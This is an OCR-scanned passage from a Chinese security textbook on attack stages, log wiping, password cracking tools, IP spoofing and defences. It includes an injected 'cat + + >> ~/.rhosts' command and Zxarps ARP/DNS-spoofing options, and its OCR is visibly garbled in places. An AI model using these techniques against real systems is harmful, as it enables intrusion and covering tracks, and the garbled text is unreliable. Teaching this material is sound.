能 够 被 攻击 者 所 利用 的 漏洞 不 仅 包 括 系统 软件 设计 上 的 安全 漏洞 ， 也 包括 由 于 管理 配 
置 不 当 而 造成 的 漏洞 。 前 不 入， 因特网 上 应 用 最 普及 的 著名 WWW 服务 器 提供 商 Apache 
的 主页 被 黑客 攻破 , 其 主页 面 上 的 Powered by Apache 图 样 (羽毛 状 的 图 画 ) 被 改 成 了 Powered 
by Microsoft Backoffice 的 图 样 ， 攻 击 者 就 是 利用 了 管理 员 对 Webserver 数据 库 的 一 些 不 当 
配置 而 成 功 取得 最 高 权限 的 。 

当然 大 多 数 攻击 成 功 的 范例 还 是 利用 了 系统 软件 本 身 的 漏洞 。 造 成 软件 漏洞 的 主要 原 
因 在 于 编制 该 软件 的 程序 员 缺 乏 安全 意识 。 当 攻击 者 对 软件 进行 非 正常 的 调用 请 求 时 造成 
缓冲 区 溢出 或 者 对 文件 的 非法 访问 ,其 中 利用 缓冲 区 溢出 进行 的 攻击 最 为 普遍 , 据 统 计 80% 
以 上 成 功 的 攻击 都 是 利用 了 缓冲 区 溢出 漏洞 来 获得 非法 权限 的 。 关 于 缓冲 区 溢出 在 后 面 用 
专门 章节 来 做 详细 解释 。 

无 论 作为 一 个 黑客 还 是 一 个 网 络 管理 员 ， 都 需要 掌握 尽量 多 的 系统 漏洞 。 黑 客 需 要 用 
这 些 漏洞 来 进行 攻击 ， 而 管理 员 需 要 根据 不 同 的 漏洞 来 进行 不 同 的 防御 措施 。 了 解 最 新 最 
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多 的 漏洞 信息 ， 可 以 到 诸如 Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify. 
com)、Securityfocus(www.securityfocus.com) 等 网 站 去 查找 。 

2) 权限 的 扩大 

系统 漏洞 分 为 远程 漏洞 和 本 地 漏洞 两 种 ， 远 程 漏洞 是 指 黑客 可 以 在 别 的 计算 机 上 直接 
利用 该 漏洞 进行 攻击 并 获取 一 定 的 权限 。 这 种 漏洞 的 威胁 性 相当 大 ， 黑 客 的 攻击 一 般 都 是 
从 远程 漏洞 开始 的 。 但 是 利用 远程 漏洞 获取 的 不 一 定 是 最 高 权限 ， 往 往 只 是 一 个 普通 用 户 
的 权限 ， 这 样 黑客 们 常常 没有 办 法 做 想 要 做 的 事 。 这 时 就 需要 配合 本 地 漏洞 来 把 获得 的 权 
限 进行 扩大 ， 常 常 是 扩大 至 系统 的 管理 员 权 限 。 

只 有 获得 了 最 高 的 管理 员 权限 之 后 ， 才 可 以 做 诸如 网 络 监听 、 打 扫 痕 迹 之 类 的 事情 。 
要 完成 权限 的 扩大 ， 不 但 可 以 利用 已 获得 的 权限 在 系统 上 执行 利用 本 地 漏洞 的 程序 ， 还 可 
以 放 一 些 木马 之 类 的 欺骗 程序 来 套 取 管理 员 密 码 , 这 种 木马 是 放 在 本 地 套 取 最 高 权限 用 的 ， 
而 不 能 进行 远程 控制 。 例 如 一 个 黑客 已 经 在 一 台 计 算 机 上 获得 了 一 个 普通 用 户 的 帐号 和 登 
录 权 限 ， 那 么 他 就 可 以 在 这 人 台 计 算 机 上 放置 一 个 假 的 su 程序 。 一 旦 黑客 放置 了 假 su 程序 ， 
当真 正 的 合法 用 户 登 录 时 ， 运 行 了 su， 并 输入 了 密码 ， 这 时 root 密码 就 会 被 记录 下 来 ， 下 
次 黑客 再 登录 时 就 可 以 使 用 su 变 成 root 了 。 

3. 攻击 的 善后 工作 


如 果 攻 击 者 完成 攻击 后 就 立刻 离开 系统 而 不 做 任何 善后 工作 ， 那 么 他 的 行踪 将 很 快 被 
系统 管理 员 发 现 ， 因 为 所 有 的 网 络 操作 系统 一 般 都 提供 日 志 记 录 功 能 ， 会 把 系统 上 发 生 的 
动作 记录 下 来 。 所 以 ， 为 了 自身 的 隐蔽 性 ， 黑 客 一 般 都 会 抹 掉 自己 在 日 志 中 留 下 的 痕迹 。 

1) ”隐藏 踪迹 

攻击 者 在 获得 系统 最 高 管理 员 权限 之 后 就 可 以 随意 修改 系统 上 的 文件 了 ， 包 括 日 志 
件 ， 所 以 一 般 黑客 想 要 隐藏 自己 的 踪迹 的 话 ， 就 会 对 日 志 进 行 修改 。 最 简单 的 方法 当然 就 
是 删除 日 志文 件 了 ， 但 这 样 做 虽然 避免 了 系统 管理 员 根据 瑟 追踪 到 自己 , 但 也 明确 无 误 地 
告诉 了 管理 员 ， 系 统 已 经 被 入 侵 了 。 所 以 最 常用 的 办 法 是 只 对 日 志文 件 中 有 关 自 己 的 那 一 
部 分 做 修改 。 关 于 修改 方法 的 具体 细节 根据 不 同 的 操作 系统 有 所 区 别 ， 网 络 上 有 许多 此 类 
功能 的 程序 ， 例 如 zap、wipe 等 ， 其 主要 做 法 就 是 清除 utmp、wtmp、Lastlog 和 Pacct 等 日 
志文 件 中 某 一 用 户 的 信息 ， 使 得 当 使 用 w、who、last 等 命令 查看 日 志文 件 时 ， 隐 藏 掉 此 用 
户 的 信息 。 

2) 后门 

一 般 黑 客 都 会 在 攻 入 系统 后 不 只 一 次 地 进入 该 系统 ,为 了 下 次 再 进入 系统 时 方便 一 点 ， 
黑客 会 留 下 一 个 后 门 ， 特 洛 伊 木马 就 是 后 门 的 最 好 范例 。 


3.2 口令 攻击 
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3.2.1 原理 


攻击 者 攻击 目标 时 常常 把 破译 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 或 者 确 
定 用 户 的 口令 ， 他 就 能 获得 计算 机 或 者 网 络 的 访问 权 ， 并 能 访问 到 用 户 能 访问 到 的 任何 资 
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源 。 如 果 这 个 用 户 有 域 管理 员 或 root 用 户 权 限 ， 这 是 极其 危险 的 。 

这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 帐号 ， 然 后 再 进行 合法 用 户 
口令 的 破译 。 

1. 获得 普通 用 户 帐号 的 方法 

获得 普通 用 户 帐号 的 方法 很 多 ， 如 下 所 示 。 

(1) 利用 目标 主机 的 Finger 功能 ， 当 用 Finger 命令 查询 时 ， 主 机 系统 会 将 保存 的 用 户 
资料 (如 用 户 名 、 登 录 时 间 等 ) 显 示 在 终端 或 计算 机 上 。 

(2) 利用 目标 主机 的 X.500 服务 : 有 些 主机 没有 关闭 X.500 的 目录 查询 服务 ， 也 给 攻 
击 者 提供 了 获得 信息 的 一 条 简易 途径 。 

(3) 从 电子 邮件 地 址 中 收集 : 有 些 用 户 电 子 邮 件 地 址 常会 透露 其 在 目标 主机 上 的 帐号 。 

(4) 查看 主机 是 否 有 习惯 性 的 帐号 ， 有 经 验 的 用 户 都 知道 ， 很 多 系统 会 使 用 一 些 习 惯 
性 的 帐号 ， 造 成 帐号 的 泄露 。 

2. 获得 用 户口 令 的 方法 

获得 用 户口 令 有 三 种 方法 ， 如 下 所 述 。 

(1) 通过 网 络 监听 非法 得 到 用 户口 令 ， 这 类 方法 有 一 定 的 局 限 性 ， 但 危害 性 极 大 。 监 
听 者 往往 采用 中 途 截获 的 方法 ， 这 是 获取 用 户 帐户 和 密码 的 一 条 有 效 途径 。 当 前 ， 很 多 协 
议 根 本 就 没有 采用 任何 加 密 或 身份 认证 技术 ， 如 在 Telnet、FTP、HTTP、SMITP 等 传输 协 
议 中 ， 用 户 帐户 和 密码 信息 都 是 以 明文 格式 传输 的 ， 此 时 若 攻 击 者 利用 数据 包 截取 工具 便 
可 很 容易 地 收集 到 你 的 帐户 和 密码 。 还 有 一 种 中 途 截获 攻击 方法 ， 它 在 你 同 服务 器 端 完成 
“三 次 握手 ”建立 连接 之 后 ， 在 通信 过 程 中 扮演 “第 三 者 ”的 角色 ， 假 冒 服务 器 身份 欺骗 
你 ， 再 假冒 你 向 服务 器 发 出 恶意 请 求 ， 其 造成 的 后 果 不 堪 设想 。 另 外 ， 攻 击 者 有 时 还 会 利 
用 软件 和 硬件 工具 时 刻 监 视 系 统 主机 的 工作 , 等 待 记录 用 户 登 录 信 息 ， 从 而 取得 用 户 密 码 ， 
或 者 编制 有 缓冲 区 溢出 错误 的 SUID 程序 来 获得 超级 用 户 权限 。 

(2) 在 知道 用 户 的 帐号 后 (如 电子 邮件 @ 前 面 的 部 分 ) 利 用 一 些 专门 软件 强行 破解 用 户 
口令 ， 这 种 方法 不 受 网 段 限制 ， 但 攻击 者 要 有 足够 的 耐心 和 时 间 。 如 ， 采 用 字典 穷 举 法 (或 
称 暴 力 法 ) 来 破解 用 户 的 密码 。 攻 击 者 可 以 通过 一 些 工具 程序 ， 自 动 地 从 计算 机 字典 中 取出 
-个 单词 ， 作 为 用 户 的 口令 ， 再 输入 给 远 端 的 主机 ， 申 请 进入 系统 ， 若 口令 错误 ， 就 按 序 
取出 下 一 个 单词 ， 进 行 下 一 个 尝试 ， 并 一 直 循 环 下 去 ， 直 到 找到 正确 的 口令 或 字典 的 单词 
试 完 为 止 。 由 于 这 个 破译 过 程 由 计算 机 程序 来 自动 完成 ， 因 而 几 个 小 时 就 可 以 把 上 十 万 条 
记录 的 字典 里 的 所 有 单词 都 尝试 一 遍 。 

(3) 利用 系统 管理 员 的 失误 。 在 现代 的 UNIX 操作 系统 中 ， 用 户 的 基本 信息 存放 在 
passwd 文件 中 ， 而 所 有 的 口令 在 经 过 DES 加 密 方法 加 密 后 专门 存放 在 一 个 叫 shadow 的 文 
件 中 。 黑客 们 获取 口令 文件 后 , 就 会 使 用 专门 的 破解 DES 加 密 法 的 程序 来 破解 口令 。 同 时， 
由 于 为 数 不 少 的 操作 系统 都 存在 许多 安全 漏洞 、Bug 或 一 些 其 他 设计 缺陷 ， 这 些 缺 陷 一 旦 
被 找 出 ， 黑 客 就 可 以 长 驱 直 入 。 例 如 ， 让 Windows 95/98 系统 后 门洞 开 的 BO 就 是 利用 了 
Windows 的 基本 设计 缺陷 。 

特洛伊 木马 程序 可 以 直接 侵入 用 户 的 计算 机 并 进行 破坏 ， 它 常 被 伪装 成 工具 程序 或 者 
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游戏 等 诱 使 用 户 打开 带 有 特洛伊 木马 程序 的 邮件 附件 或 从 网 上 直接 下 载 特洛伊 木马 程序 ， 
一 旦 用 户 打开 了 这 些 邮件 的 附件 或 者 执行 了 这 些 程序 之 后 ， 它 们 就 会 像 古 特洛伊 人 在 敌人 
城 外 留 下 的 藏 满 士兵 的 木马 一 样 留 在 自己 的 计算 机 中 ， 并 在 自己 的 计算 机 系统 中 隐藏 一 个 
可 以 在 Windows 启动 时 悄悄 执行 的 程序 。 当 连 接 到 因特网 上 时 , 这 个 程序 就 会 通知 攻击 者 ， 
来 报告 P 地 址 以 及 预先 设 定 的 端口 。 攻 击 者 在 收 到 这 些 信息 后 ,再 利用 这 个 潜伏 在 其 中 的 
程序 ,就 可 以 任意 地 修改 你 的 计算 机 的 参数 设 定 、 复 制 文件 、 窥视 你 整个 硬盘 中 的 内 容 等 ， 
从 而 达到 控制 计算 机 的 目的 。 


3.2.2 口令 攻击 的 类 型 


(1) 社会 工程 学 (Social Engineering)。 通 过 人 际 交 往 这 一 非 技术 手段 ， 以 欺骗 、 套 取 的 
方式 来 获得 口令 。 避 免 此 类 攻击 的 对 策 是 加 强 用 户 安全 意识 。 

(2) 猜测 攻击 。 首 先 使 用 口令 猜测 程序 进行 攻击 。 口 令 猜 测 程序 往往 根据 用 户 定义 口 
令 的 习惯 猜测 用 户口 令 ， 像 名 字 缩 写 、 生 日 、 宠 物 名 、 部 门 名 等 。 在 详细 了 解 用 户 的 社会 
背景 之 后 ， 黑 客 可 以 列举 出 几 百 种 可 能 的 口令 ， 并 在 很 短 的 时 间 内 就 可 以 完成 猜测 攻击 。 

(3) 字典 攻击 。 如 果 猜 测 攻击 不 成 功 ， 入 侵 者 会 继续 扩大 攻击 范围 ， 对 所 有 英文 单词 
进行 尝试 ， 程 序 将 按 序 取出 一 个 又 一 个 的 单词 ， 进 行 一 次 又 一 次 尝试 ， 直 到 成 功 。 据 有 的 
传媒 报导 ,对 于 一 个 有 8 万 个 英文 单词 的 集合 来 说 ， 入 侵 者 不 到 一 分 半 钟 就 可 试 完 。 所 以 ， 
如 果 用 户 的 口令 不 太 长 或 是 用 单词 、 短 语 作为 口令 ， 那 么 很 快 就 会 被 破译 出 来 。 

(4) 穷 举 攻击 。 如 果 字 典 攻击 仍然 不 能 成 功 ， 入 侵 者 会 采取 穷 举 攻击 。 一 般 从 长 度 为 
1 的 口令 开始 ， 按 长 度 递增 进行 尝试 攻击 。 由 于 人 们 往往 偏爱 简单 易 记 的 口令 ， 穷 举 攻 击 
的 成 功率 很 高 。 如 果 每 千 分 之 一 秒 检查 一 个 口令 , 那么 86% 的 口令 可 以 在 一 周 内 破译 出 来 。 

(5) 混合 攻击 。 结 合 了 字典 攻击 和 穷 举 攻击 ， 先 字典 攻击 ， 再 穷 举 攻击 。 

(6) 直接 破解 系统 口令 文件 。 所 有 的 攻击 都 不 能 够 奏效 ， 入 侵 者 就 会 寻找 目标 主机 的 
安全 漏洞 和 薄弱 环节 ， 伺 机 偷 走 存放 系统 口令 的 文件 ， 然 后 破译 加 密 的 口令 ， 以 便 冒充 合 
法 用 户 访问 这 台 主 机 。 

(7) 网 络 嗅 探 (Sniffer)。 通 过 嗅 探 器 在 局 域 网 内 嗅 探 以 明文 传输 的 口令 字符 串 。 避免 此 
类 攻击 的 对 策 是 网 络 传输 采用 加 密 传输 的 方式 进行 。 

(8) 键盘 记录 。 在 目标 系统 中 安装 键盘 记录 后 门 ， 记 录 操 作 员 输入 的 口令 字符 串 ， 如 
很 多 间谍 软件 、 木 马 等 都 可 能 会 资 取 你 的 口令 。 

(9) 其 他 攻击 方式 。 如 中 间 人 攻击 、 重 放 攻 击 、 生 日 攻击 、 时 间 攻 击 、 偷 罕 攻 击 等 。 


3.2.3 方法 (或 工具 ) 


1. NT 口令 破解 程序 


1) LOphtcrack 

LOphtcrack 是 一 个 NT 口令 审计 工具 ,能 根据 操作 系统 中 存储 的 加 密 哈 希 计算 NT 口令 ， 
功能 非常 强大 、 丰 富 ， 是 目前 市 面 上 最 好 的 NT 口令 破解 程序 之 一 。 它 有 三 种 方式 可 以 破 
解 口令 : 字典 攻击 、 组 合 攻击 、 强 行 攻击 。LOphtcrack 不 仅 有 一 个 美观 、 容 易 使 用 的 GUI ， 
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而 且 利用 了 NT 的 两 个 实际 缺陷 ， 这 使 得 LOphtcrack 速度 奇 快 。 

2) NTSweep 

NTSweep 使 用 的 方法 和 其 他 口令 破解 程序 不 同 . 它 不 是 下 载 口令 并 离线 破解 ,NTSweep 

是 利用 了 Microsoft 允许 用 户 改变 口令 的 机 制 。NTSweep 首先 取 定 一 个 单词 ， 然 后 使 用 这 

个 单词 作为 帐号 的 原始 口令 并 试图 把 用 户 的 口令 改 为 同一 个 单词 。 如 果 主 域 控制 计算 机 返 
回 失败 信息 ， 就 可 知道 这 不 是 原来 的 口令 。 反 之 ， 如 果 返 回 成 功 信息 ， 就 说 明 这 一 定 是 帐 
号 的 口令 。 因 为 口令 还 是 原来 的 值 ， 所 以 用 户 永远 不 会 知道 口令 曾经 被 人 修改 过 。 

NTSweep 非常 有 用 ， 因 为 它 能 通过 防火 墙 ， 也 不 需要 任何 特殊 权限 来 运行 。 但 是 也 有 
缺点 ， 首 先 运行 起 来 较 慢 ; 其次， 尝试 修改 口令 并 失败 的 信息 会 被 记录 下 来 ， 会 被 管理 员 
检测 到 ; 最后， 使 用 这 种 技术 的 猜测 程序 不 会 给 出 精确 信息 ， 如 有 些 情况 不 准 用 户 更 改口 
令 ， 这 时 程序 会 返回 失败 信息 ， 即 使 口令 是 正确 的 。 

3) NTCrack 

NTCrack 是 UNIX 破解 程序 的 一 部 分 ， 但 是 却 在 NT 环境 下 破解 。NTCrack 与 UNIX 
中 的 破解 类 似 ， 但 是 NTCrack 在 功能 上 非常 有 限 。 它 不 像 其 他 程序 一 样 提取 哈 希 口令 ， 它 
和 NTSweep 的 工作 原理 类 似 ， 必 须 给 NTCrack 一 个 user ID 和 要 测试 的 口令 组 合 ， 然 后 程 
序 会 告诉 用 户 是 否 成 功 。 

人， PWDump 

PWDump 不 是 一 个 口令 破解 程序 , 但 是 它 能 用 来 从 SAM( 安 全 帐户 管理 器 ) 数 据 库 中 提 
取 哈 希 口令 ,虽然 LOphterack 已 经 内 建 了 这 个 特征 ,但 是 PWDump 依然 存在 其 独特 的 优点 。 
首先 ， 它 是 一 个 小 型 的 、 易 使 用 的 命令 行 工具 ， 能 提取 哈 希 口令 ， 其 次 ， 目 前 很 多 情况 下 
LOphtcrack 的 版 本 不 能 提取 哈 希 口令 , 如 SYSTEM 是 一 个 能 在 NT 下 运行 的 程序 , 为 SAM 
数据 库 提 供 了 很 强 的 加 密 功 能 ， 如 果 SYSTEM 在 使 用 ，LOphtcrack 就 无 法 提取 哈 希 口令 ， 
但 是 PWDump 还 能 使 用 ， 而 且 要 在 Windows 2000 下 提取 哈 希 口令 ， 必 须 使 用 PWDump， 
因为 系统 使 用 了 更 强 的 加 密 模式 来 保护 信息 。 

2. UNIX 口令 破解 程序 


1) Crack 

Crack 是 一 个 旨 在 快速 定位 UNIX 口令 弱点 的 口令 破解 程序 。Crack 使 用 标准 的 猜测 技 
术 确 定 口令 。 它 检查 口令 是 否 为 如 下 情况 之 一 : 和 user ID 相同 、 单 词 password、 数 字 串 、 
字母 串 。Crack 通过 加 密 一 长 串 可 能 的 口令 ,并 把 结果 和 用 户 的 加 密 口 令 相 比较 ， 看 其 是 否 
匹配 。 用 户 的 加 密 口 令 必 须 是 在 运行 破解 程序 之 前 就 已 经 提供 的 。 

2) John the Ripper 

John the Ripper 是 UNIX 口令 破解 程序 ， 但 也 能 在 Windows 平台 运行 ， 功 能 强大 、 运 
行 速度 快 ， 可 进行 字典 攻击 和 强行 攻击 。 

3) XIT 

XIT 是 一 个 执行 字典 攻击 的 UNIX 口令 破解 程序 。XIT 的 功能 有 限 ， 因 为 它 只 能 运行 
字典 攻击 ， 但 程序 很 小 ， 运 行 很 快 。 
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4) Slumpie 

Slurpie 能 执行 字典 攻击 和 定制 的 强行 攻击 ， 但 要 规定 所 需要 使 用 的 字符 数目 和 字符 类 
型 。Slurpie 发 起 一 次 攻击 , 使 用 7 个 字符 或 8 个 字符 且 仅 使 用 小 写字 母 口令 进行 强行 攻击 。 

和 John、Crack 相 比 ，Slurpie 最 大 的 优点 是 它 能 分 布 运行 ，Slurpie 能 把 几 台 计算 机 组 
成 一 台 分 布 式 虚拟 计算 机 在 很 短 的 时 间 里 完成 破解 任务 。 


3.2.4 防护 

要 有 效 防范 口令 攻击 ， 我 们 要 选择 一 个 好 口令 ， 并 且 要 注意 保护 好 口令 的 安全 。 

1. 好 口令 是 防范 口令 攻击 的 最 基本 、 最 有 效 的 方法 

最 好 采用 字母 、 数 字 、 标 点 符号 、 特 殊 字符 的 组 合 ， 同 时 有 大 小 写字 母 ， 长 度 最 好 达 
到 8 个 以 上 ， 最 好 容易 记忆 ， 不 必 把 口令 写 下 来 ， 绝 对 不 要 用 自己 或 亲友 的 生日 、 手 机 号 
码 等 易于 被 他 人 获知 的 信息 作 密 码 。 

请 看 下 面 这 些 口令 

jordan 

123456 

19790101 

13800138000 

每 个 人 都 会 认同 类 似 上 面 的 口令 是 不 安全 的 。 

再 看 下 面 这 些 口令 

AiP (jig&loi092 

Pj%^];jie20ww 

上 面 这 两 个 口令 肯定 很 难 破解 ， 但 是 对 于 使 用 者 来 说 ， 同 样 很 难 记 住 ， 只 能 把 口令 记 
在 纸 上 ， 一 旦 记录 口令 的 纸 被 人 发 现 ， 那 么 就 成 为 众所周知 的 口令 ， 这 比 破解 一 个 典型 的 
口令 更 容易 。 

再 看 下 面 这 些 口令 

LLagoTislK(Long Long ago,There is a king) 

FSand7Yago (Four score and seven years ago) 

上 面 这 两 个 口令 很 难 破解 ， 同 时 对 于 使 用 者 来 说 又 方便 记忆 ， 因 此 类 似 上 面 这 样 的 口 
令 是 比较 合适 的 口令 。 

2. 注意 保护 口令 安全 

不 要 将 口令 记 在 纸 上 或 存储 于 计算 机 文件 中 ;最 好 不 要 告诉 别人 你 的 口令 ;不 要 在 不 
同 的 系统 中 使 用 相同 的 口令 ， 在 输入 口令 时 应 确保 无 人 在 身边 窥视 ， 在 公共 上 网 场所 ， 如 
网 吧 等 处 最 好 先 确认 系统 是 否 安全 ;定期 更 改口 令 ， 至 少 6 个 月 更 改 一 次 ， 这 会 使 自己 遭 
受 口令 攻击 的 风险 降 到 最 低 。 
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3.3.1 原理 

1. IP 欺骗 攻击 的 举例 

假设 B 上 的 客户 运行 rllogin 与 A 上 的 rlogind 通信 。 

(1) B 发 送 带 有 SYN 标志 的 数据 段 通知 A 需要 建立 TCP 连接 ， 并 将 TCP 报头 中 的 
sequence number 设置 成 自己 本 次 连接 的 ISN 初始 值 。 

(2) A 回 传 给 B 一 个 带 有 SYS+ACK 标志 的 数据 段 ， 告 知 B 自己 的 ISN， 并 确认 了 B 发 
送 来 的 第 一 个 数据 段 ， 并 将 acknowledge number 设置 成 B 的 ISN+1。 

(3) B 确认 收 到 的 A 的 数据 段 ， 将 acknowledge number 设置 成 A 的 ISN+1。 


B ---- SYN ----> R 
B <---- SYN+ACK A 
B ---- ACK ----> R 


TCP 使 用 的 sequence number 是 一 个 32 位 的 计数 器 ， 从 0 一 4294967295。 

TCP 为 每 一 个 连接 选择 一 个 ISN 初始 序号 , 为 了 防止 因为 延迟 、 重 传 等 扰乱 三 次 握手 ， 
ISN 不 能 随便 选取 ,不 同系 统 有 不 同 算法 。 理 解 TCP 如 何 分 配 ISN 以 及 ISN 随时 间 变 化 的 
规律 ， 对 于 成 功 地 进行 IP 欺骗 攻击 很 重要 。 

基于 远程 调用 RPC( 远 程 过 程 调用 ) 的 命令 , 比如 rlogin、 rcp、rsh 等 , 根据 /etc/hosts.equiv 
以 及 $HOME/rhosts 文件 进行 安全 校 验 , 其 实质 仅仅 是 根据 信 源 了 P 地 址 进行 用 户 身份 确认 ， 
以 便 允 许 或 拒绝 用 户 RPC。 

2. IP 欺骗 攻击 的 描述 

IP 欺骗 攻击 的 描述 如 下 。 

(1) 假设 Z 企图 攻击 A， 而 A 信任 B， 所 谓 信任 指 /etc/hosts.equiv 和 $HOME/.rhosts 中 
有 相关 设置 。 注 意 ， 如 何 才 能 知道 A 信任 B 呢 ? 没有 什么 确切 的 办 法 ， 只 能 是 平时 注意 搜 
集 蛛 丝 马 迹 ， 厚 积 薄 发 。 

(2) 假设 Z 已 经 知道 了 被 信任 的 B， 应 该 想 办 法 使 B 的 网 络 功能 暂时 瘫痪 ， 以 免 对 攻 
击 造成 干扰 。Z 向 B 发 送 多 个 带 有 SYN 标志 的 数据 段 请 求 连接 ， 注 意 将 信 源 PP 地 址 换 成 

-个 不 存在 的 主机 X。B 向 子虚乌有 的 X 发 送 SYN+ACK 数据 段 ， 但 没有 任何 来 自 和 X 的 

ACK 出 现 。B 的 瑟 层 会 报告 B 的 TCP 层 , 和 X 不 可 达 , 但 B 的 TCP 层 对 此 不 予 理 皮 ,认为 
只 是 暂时 的 。 于 是 B 在 这 个 initsockid 上 再 也 不 能 接收 正常 的 连接 请 求 。 具 体 如 下 。 


Z(X) ---- SYN ----> B 
Z(X) ---- SYN ----> B 
Z(X) ---- SYN ----> B 
Z(X) ---- SYN ----> B 
Z(X) ---- SYN ----> B 


外 中 蕴 光 得。 营 到 罗网 络 政 坦 方法 与 房 护 


X <-—-— SYN+ACK B 
X <---- SYN+ACK B 
X <---- SYN+ACK B 
X <---- SYN+ACK B 
X <---- SYN+ACK B 


(3) Z 必须 确定 A 当前 的 ISN。 首 先 连 向 25 端口 (SMTP 是 没有 安全 校 验 机 制 的 )， 与 
(中 类 似 ， 不 过 这 次 需要 记录 A 的 ISN， 以 及 Z 到 A 的 大 致 的 RTTGound trip time)。 这 个 
步骤 要 重复 多 次 以 便 求 出 RTT 的 平均 值 。 现 在 Z 知道 了 A 的 ISN 基 值 和 增加 规律 (比如 每 
秒 增加 128000， 每 次 连接 增加 64000)， 也 知道 了 从 Z 到 A 需要 RTT/2 的 时 间 。 必 须 立 即 
进入 攻击 ， 否 则 在 这 之 间 如 有 其 他 主机 与 A 连接 ，ISN 将 比 预料 的 多 出 64000。 

(4) Z 向 A 发 送 带 有 SYN 标志 的 数据 段 请求 连 接 :， 只 是 将 信 源 他 改 成 了 B 的 卫 , 注 
意 这 里 针对 的 是 TCP513 端口 (rlogin)。A 向 B 回 送 SYN+ACK 数据 段 ，B 已 经 无 法 响应 ， 
B 的 TCP 层 只 是 简单 地 丢弃 A 的 回 送 数 据 段 。 

(5) Z 和 暂停 一 小 会 儿 ， 让 A 有 足够 时 间 发 送 SYN+ACK， 因 为 Z 看 不 到 这 个 包 。 然 后 
Z 再 次 伪装 成 B 向 A 发 送 ACK， 此 时 发 送 的 数据 段 带 有 Z 预测 的 A 的 ISN+1。 如 果 预 测 
准确 ， 建 立 连接 ， 数 据 传送 开始 。 问 题 在 于 即使 连接 建立 ，A 仍然 会 向 B 发 送 数据 ， 而 不 
是 Z，Z 仍然 无 法 看 到 A 发 往 B 的 数据 段 ，Z 必须 蒙 着 头 按照 rlogin 协议 标准 假冒 B 向 A 
发 送 类 似 cat + + >> ~/.rhosts 这 样 的 命令 ， 于 是 攻击 完成 。 如 果 预 测 不 准确 ，A 将 发 送 一 
个 带 有 RST 标志 的 数据 段 异常 终止 连接 ，Z 只 有 从 头 再 来 。 


2Z(B) ---- SYN ----> R 
B <---- SYN+ACK A 

2(B) ---- ACK ----> R 
2(B) ---- PSH ----> R 


(6) 四 欺骗 攻击 利用 了 RPC 服务 器 仅仅 依赖 于 信 源 瑟 地 址 进行 安全 校 验 的 特性 。 


3.3.2 方法 (或 工具 ) 


Zxarps.exe 是 一 款 局 域 网 内 进行 IP 欺骗 的 有 效 工 具 ， 下 面 介绍 Zxarps.exe 的 使 用 。 

。 -idx [index]: 网 卡 索引 号 。 

e -ip [ip]: 欺骗 的 耳 ， 用 “-” 指 定 范围 ， 多 个 具体 卫 用 “,” 隔 开 。 

e -sethost [ip]: 默认 是 网 关 , 可 以 指定 别 的 人。 

。 -port [port]: 关注 的 端口 ， 用 “-” 指 定 范围 ， 多 个 具体 端口 用 “,” 隔 开 ， 没 指定 

则 关注 所 有 端口 。 

-reset: 恢复 目标 机 的 ARP( 地 址 解析 协议 ) 表 。 

。 ”-hostname: 探测 主机 时 获取 主机 名 信息 。 

。 ”-logfilter [string]: 设置 保存 数据 的 条 件 ， 必 须 使 用 “+”，“-”，“_” 做 前 缀 ， 
后 跟 关 键 字 ，“,” 隔 开关 键 字 ， 多 个 条 件 “|” 隔 开 。 所 有 带 “+” 前 缀 的 关键 字 
都 出 现 的 包 则 写 入 文件 ， 带 “-” 前 绥 的 关键 字 出 现 的 包 不 写 入 文件 ， 带 “_ ”前 
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组 的 关键 字 一 个 符合 则 写 入 文件 如 有 “+-” 条 件 也 要 符合 )。 
。 -save_a [filename]: 将 捕捉 到 的 数据 以 ACSII 模式 写 入 文件 。 
e -save h [filename]: HEX 模式 。 
。 -hacksite [ip]: 指定 要 插入 代码 的 站 点 域名 或 卫 ， 多 个 可 用 “，” 隔 开 ， 没 指定 则 
影响 所 有 站 点 。 
-insert [html code]: 指定 要 插入 html 代码 。 
-postfix [string]: 后 级 名 只 关注 HTTP/1.1 302。 
-hackURL [url]: 发 现 关注 的 后 缀 名 后 修改 URL 到 新 的 URL。 
-filename [name]: 新 URL 上 有 效 的 资源 文件 名 。 
-hackdns [string]: DNS 欺骗 ， 只 修改 UDP 的 报 文 ， 多 个 可 用 “,” 隔 开 ， 格 式 为 
域名 |I 卫 ，www-.aa.com|222.22.2.2，www.bb.coml1.1.1.1。 
e -Interval [ms]: 定时 欺骗 的 时 间 间 隔 ， 单 位 : 毫秒 ， 默 认 是 3000ms。 
e -spoofmode [1|2|3]: 将 数据 编发 到 本 机 ， 欺 骗 对 象 : 1 为 网 关 ，2 为 目标 机 ，3 为 


两 者 都 有 。 
e。 -speed [kb]: 限制 指定 的 他 或 他 段 的 网 络 总 带宽 ， 单 位 : KB。 
3.3.3 防护 


(1) 防护 的 要 点 在 于 ， 这 种 攻击 的 关键 是 相对 粗糙 的 初始 序列 号 变量 在 Berkeley 系统 
中 的 改变 速度 。TCP 协议 需要 这 个 变量 每 秒 增加 25000 次 。Berkeley 使 用 的 是 相对 比较 慢 
的 速度 。 但 是 ， 最 重要 的 是 改变 间隔 ， 而 不 是 速度 。 

考虑 一 下 一 个 计数 器 工作 在 250000Hz 时 是 否 有 帮助 。 先 忽略 其 他 发 生 的 连接 ， 仅 仅 
考虑 这 个 计数 器 以 固定 的 频率 改变 。 

为 了 知道 当前 的 序列 号 ， 发 送 一 个 SYN 包 ， 收 到 一 个 回复 : 

X---S: SYN(ISN X ) 

S---X: SYN(ISN S ) ,ACK(ISN X ) (1) 

第 一 个 欺骗 包 ， 它 触发 下 一 个 序列 号 ， 能 立即 跟随 服务 器 对 这 个 包 的 反应 : 

X---S: SYN(ISN X ) ;SRC = T (2) 

序列 号 ISN S 用 于 回应 : 

S---T: SYN(ISN S ) ,ACK(ISN X ) 

这 是 由 第 一 个 消息 和 服务 器 接收 的 消息 唯一 决定 的 。 这 个 号 码 是 义 和 S 的 往返 精确 的 
时 间 。 这 样 ， 如 果 欺 骗 能 精确 地 测量 和 产生 这 个 时 间 ， 即 使 是 一 个 4-U 时 钟 都 不 能 击 退 这 
次 攻击 。 

(2) 抛弃 基于 地 址 的 信任 策略 。 阻 止 这 类 攻击 的 一 种 非常 容易 的 办 法 就 是 放弃 以 地 址 
为 基础 的 验证 。 不 允许 rx 类 远程 调用 命令 的 使 用 : 删除 .rhosts 文件 ; 清空 /etc/hosts.equiv 文 
